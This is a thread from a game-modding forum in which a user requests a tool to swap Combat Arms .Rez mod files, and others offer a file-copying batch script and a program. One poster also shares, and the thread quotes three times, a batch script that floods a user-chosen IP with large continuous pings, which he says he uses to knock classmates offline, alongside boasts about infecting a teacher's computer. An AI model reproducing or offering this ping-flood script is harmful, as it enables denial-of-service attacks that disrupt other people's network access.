Question[Request] Rez Changer Program

Posts 1–15 of 15 · Page 1 of 1
[Request] Rez Changer Program
Idk if this goes here or in the programming section, but this is a request. I'm posting it here because its not a mod request, its a modding tool request. Here is what I want:

Basically I'm making a fucking huge mod pack, and its a bitch to have to keep injecting, restarting, etc to get the screenies. So I was thinking... What if there was a program that replace the Rez automatically?

Here's what I'm thinking:
-You would make a new .Rez for each mod, and name them all the same thing. For example if your making a red, orange, and blue sniper skin, you'd make 3 folders for each of the colors, and make them all rez's, by copying the original Rez into the folder and injecting.
-Then you could select all the Rez's and you could like press something to activate the program and it will automatically switch the Rez in the Game folder with the one you selected.

Idk if this is possible, but I'll pay someone 20 bucks (Paypal) or 20k NX to make this.

If you have anymore questions regarding it, PM/VM me.

Edit: I just realized I forgot to put a title TT_TT
You know you can just extract the files, leave them in the folders, then rename the REZ and the game will use the files in the folders.. right?

You can also change a lot of files when you are in the lobby by alt-tabbing out. The game loads most of the models / textures when loading a map/game.
Quote Originally Posted by Drigien View Post
You know you can just extract the files, leave them in the folders, then rename the REZ and the game will use the files in the folders.. right?

You can also change a lot of files when you are in the lobby by alt-tabbing out. The game loads most of the models / textures when loading a map/game.
I know, but I have like 30+ dtx to take screenies of, and its a pain to go back and forth
I'll make a Batch file for you?

I hope you aren't trolling about the money, cause I'm shit poor atm.



Here's an example of a batch I made for bombing people in my classroom to lag them off the Interwebs. It only does roughly 320 KB/s as it is. (but you could make it do more of course.)

Code:
@ECHO off

if exist cmd.exe goto User
:User
Set User=
Set /P User=Choose an IP to Bomb, then press Enter.: %=%
goto Choice
:Choice
choice /c yne /t 10 /d n /m "Bomb %User%?"
if errorlevel 3 goto End
if errorlevel 2 goto User
if errorlevel 1 goto 1
:1
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 2 else goto End
:2
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 3 else goto End
:3
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 4 else goto End
:4
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 5 else goto End
:5
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto Pause2 else goto End
:Pause2
:End
exit
Quote Originally Posted by Falingrave View Post
I'll make a Batch file for you?

I hope you aren't trolling about the money, cause I'm shit poor atm.



Here's an example of a batch I made for bombing people in my classroom to lag them off the Interwebs. It only does roughly 320 KB/s as it is. (but you could make it do more of course.)

Code:
@ECHO off

if exist cmd.exe goto User
:User
Set User=
Set /P User=Choose an IP to Bomb, then press Enter.: %=%
goto Choice
:Choice
choice /c yne /t 10 /d n /m "Bomb %User%?"
if errorlevel 3 goto End
if errorlevel 2 goto User
if errorlevel 1 goto 1
:1
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 2 else goto End
:2
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 3 else goto End
:3
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 4 else goto End
:4
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 5 else goto End
:5
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto Pause2 else goto End
:Pause2
:End
exit
If that can do what I'm asking and you can show me how to use it, then thats fine.
Quote Originally Posted by Falingrave View Post
I'll make a Batch file for you?

I hope you aren't trolling about the money, cause I'm shit poor atm.



Here's an example of a batch I made for bombing people in my classroom to lag them off the Interwebs. It only does roughly 320 KB/s as it is. (but you could make it do more of course.)

Code:
@ECHO off

if exist cmd.exe goto User
:User
Set User=
Set /P User=Choose an IP to Bomb, then press Enter.: %=%
goto Choice
:Choice
choice /c yne /t 10 /d n /m "Bomb %User%?"
if errorlevel 3 goto End
if errorlevel 2 goto User
if errorlevel 1 goto 1
:1
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 2 else goto End
:2
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 3 else goto End
:3
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 4 else goto End
:4
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto 5 else goto End
:5
START cmd.exe /c "color 0A&&ping -t -l 65500 %User%"
if exist cmd.exe goto Pause2 else goto End
:Pause2
:End
exit
Your mean as fuck. :3 Lol one time my friend put a virus on the teachers comp it was funny as shit.
Quote Originally Posted by Jack View Post
Idk if this goes here or in the programming section, but this is a request. I'm posting it here because its not a mod request, its a modding tool request. Here is what I want:

Basically I'm making a fucking huge mod pack, and its a bitch to have to keep injecting, restarting, etc to get the screenies. So I was thinking... What if there was a program that replace the Rez automatically?

Here's what I'm thinking:
-You would make a new .Rez for each mod, and name them all the same thing. For example if your making a red, orange, and blue sniper skin, you'd make 3 folders for each of the colors, and make them all rez's, by copying the original Rez into the folder and injecting.
-Then you could select all the Rez's and you could like press something to activate the program and it will automatically switch the Rez in the Game folder with the one you selected.

Idk if this is possible, but I'll pay someone 20 bucks (Paypal) or 20k NX to make this.

If you have anymore questions regarding it, PM/VM me.

Edit: I just realized I forgot to put a title TT_TT
me 10k nx
something like this:

Code:
@ECHO off

Echo -------------------------Syntax--------------------------
Echo.
Echo Follow the directions exactly.
Echo.
Echo It shouldn't be that hard, because I even gave
Echo you some examples. If you can't figure out
Echo how to use it, I feel really sorry for you.
Echo.
Echo Credits: FalinGrave (MPGH)
Echo.
Echo ---------------------------------------------------------
Echo.
Echo.

@ECHO off

if exist cmd.exe goto Name1
:Name1
Set Name1=
Set /P Name1=[i.e: BlahBlahBlah_Red.DTX] Type in the file name, then press Enter.: %=%
Echo Set as "%Name1%"
Set Name2=
Set /P Name2=[i.e: BlahBlahBlah.DTX] Type in what you want to Rename it to, then press Enter.: %=%
Echo Set as "%Name2%"
Set CPos=
Set /P CPos=[i.e: Root:\Users\Admin\Desktop]What folder is the Modded file Located in?: %=%
Echo Set as "%CPos%"
Set Directory=
Set /P Directory=[Minus the .Rez (Like: "GUNS_M_PV_AR")] What's the name of the Rez file you want to place it in?: %=%
Echo Set as "%Directory%"
Set CADir=
Set /P CADir=[i.e: Root:\Nexon\CA\Game] Where is your CA Game folder located?: %=%
Echo Set as "%CADir%"
Echo.
Echo Copying: "%CPos%\%Name1% to %CADir%\%Directory%\%Name2%"
goto Choice
:Choice
choice /c yne /t 30 /d n /m "Is that Correct?"
::choice /c yne /t 10 /d n /m "Rename %Name1% to %Name2% and Insert into %Directory%?"
if errorlevel 3 goto End
if errorlevel 2 goto Name1
if errorlevel 1 goto Rename
:Rename
color 0A
XCopy %CPos%\%Name1% /Y %CADir%\%Directory%\%Name2%"
goto Pause
:Pause
Pause
you might have to tweak it though.
I was still in the middle of making it thus the:

Code:
Echo Copying: "%CPos%\%Name1% to %CADir%\%Directory%\%Name2%"
goto Choice
:Choice
choice /c yne /t 30 /d n /m "Is that Correct?"
::choice /c yne /t 10 /d n /m "Rename %Name1% to %Name2% and Insert into %Directory%?"
if errorlevel 3 goto End
if errorlevel 2 goto Name1
if errorlevel 1 goto Rename
Part, with the remarks, lol.
Quote Originally Posted by Falingrave View Post
something like this:

Code:
@ECHO off

Echo -------------------------Syntax--------------------------
Echo.
Echo Follow the directions exactly.
Echo.
Echo It shouldn't be that hard, because I even gave
Echo you some examples. If you can't figure out
Echo how to use it, I feel really sorry for you.
Echo.
Echo Credits: FalinGrave (MPGH)
Echo.
Echo ---------------------------------------------------------
Echo.
Echo.

@ECHO off

if exist cmd.exe goto Name1
:Name1
Set Name1=
Set /P Name1=[i.e: BlahBlahBlah_Red.DTX] Type in the file name, then press Enter.: %=%
Echo Set as "%Name1%"
Set Name2=
Set /P Name2=[i.e: BlahBlahBlah.DTX] Type in what you want to Rename it to, then press Enter.: %=%
Echo Set as "%Name2%"
Set CPos=
Set /P CPos=[i.e: Root:\Users\Admin\Desktop]What folder is the Modded file Located in?: %=%
Echo Set as "%CPos%"
Set Directory=
Set /P Directory=[Minus the .Rez (Like: "GUNS_M_PV_AR")] What's the name of the Rez file you want to place it in?: %=%
Echo Set as "%Directory%"
Set CADir=
Set /P CADir=[i.e: Root:\Nexon\CA\Game] Where is your CA Game folder located?: %=%
Echo Set as "%CADir%"
Echo.
Echo Copying: "%CPos%\%Name1% to %CADir%\%Directory%\%Name2%"
goto Choice
:Choice
choice /c yne /t 30 /d n /m "Is that Correct?"
::choice /c yne /t 10 /d n /m "Rename %Name1% to %Name2% and Insert into %Directory%?"
if errorlevel 3 goto End
if errorlevel 2 goto Name1
if errorlevel 1 goto Rename
:Rename
color 0A
XCopy %CPos%\%Name1% /Y %CADir%\%Directory%\%Name2%"
goto Pause
:Pause
Pause
you might have to tweak it though.
I was still in the middle of making it thus the:

Code:
Echo Copying: "%CPos%\%Name1% to %CADir%\%Directory%\%Name2%"
goto Choice
:Choice
choice /c yne /t 30 /d n /m "Is that Correct?"
::choice /c yne /t 10 /d n /m "Rename %Name1% to %Name2% and Insert into %Directory%?"
if errorlevel 3 goto End
if errorlevel 2 goto Name1
if errorlevel 1 goto Rename
Part, with the remarks, lol.
CMD isn't exactly my forte. Tell me where to input what and I'll give you 40k NX. But some other kid already made a VB program for 25k, so if his doesn't work I'm using you batch.
Quote Originally Posted by Jack's Backup View Post
CMD isn't exactly my forte. Tell me where to input what and I'll give you 40k NX. But some other kid already made a VB program for 25k, so if his doesn't work I'm using you batch.
copy all of it, put it in a notepad.

Save it as "[any name you want].bat"
and set the "save as type" box to "all files"

then go double click it and follow the directions i gave you in it :U
Quote Originally Posted by Falingrave View Post


copy all of it, put it in a notepad.

Save it as "[any name you want].bat"
and set the "save as type" box to "all files"

then go double click it and follow the directions i gave you in it :U
I just read it, and it seems it'd just be easier to drag and drop the new DTXs into the folder, and rename the REZ method. But thanks :]
Or you could give me the directories and I could make it even easier to where you only have to type in the name it is now, what you want it named, and what folder you want it in (ex: GUNS_bla_bla_bla)
Quote Originally Posted by Falingrave View Post
Or you could give me the directories and I could make it even easier to where you only have to type in the name it is now, what you want it named, and what folder you want it in (ex: GUNS_bla_bla_bla)
Put 1 of 9 GUNS_PV_T_SR into I:/Nexon/Combat Arms/Game. It has to be able to find each of the folders where each diff Rez is so it can swap them out.
Quote Originally Posted by Jack View Post


Put 1 of 9 GUNS_PV_T_SR into I:/Nexon/Combat Arms/Game. It has to be able to find each of the folders where each diff Rez is so it can swap them out.
Ready to trade?
Mine:
1. Back up CLEAN REZ
2. Back up Modded REZ (optional, but recommended)
3. Open program and browse for your Combat Arms Directory. (Don't browse for /game/, just /Combat Arms/)
3. Point the program to your Mods Directory. Ex: Mods>Mod1>REZ.REZ, point it to folder "Mods"
4. Press the button or F12.

Quote Originally Posted by Jack View Post


Put 1 of 9 GUNS_PV_T_SR into I:/Nexon/Combat Arms/Game. It has to be able to find each of the folders where each diff Rez is so it can swap them out.
Ready to trade?
Mine:
1. Back up CLEAN REZ
2. Back up Modded REZ (optional, but recommended)
3. Open program and browse for your Combat Arms Directory. (Don't browse for /game/, just /Combat Arms/)
3. Point the program to your Mods Directory. Ex: Mods>Mod1>REZ.REZ, point it to folder "Mods"
4. Press the button or F12.
Quote Originally Posted by Iamazn1 View Post
Ready to trade?
Mine:
1. Back up CLEAN REZ
2. Back up Modded REZ (optional, but recommended)
3. Open program and browse for your Combat Arms Directory. (Don't browse for /game/, just /Combat Arms/)
3. Point the program to your Mods Directory. Ex: Mods>Mod1>REZ.REZ, point it to folder "Mods"
4. Press the button or F12.


Ready to trade?
Mine:
1. Back up CLEAN REZ
2. Back up Modded REZ (optional, but recommended)
3. Open program and browse for your Combat Arms Directory. (Don't browse for /game/, just /Combat Arms/)
3. Point the program to your Mods Directory. Ex: Mods>Mod1>REZ.REZ, point it to folder "Mods"
4. Press the button or F12.
Yeah, PM me media fire link.
Posts 1–15 of 15 · Page 1 of 1
This thread is closed for replies.

Tags for this Thread

None

Talk with us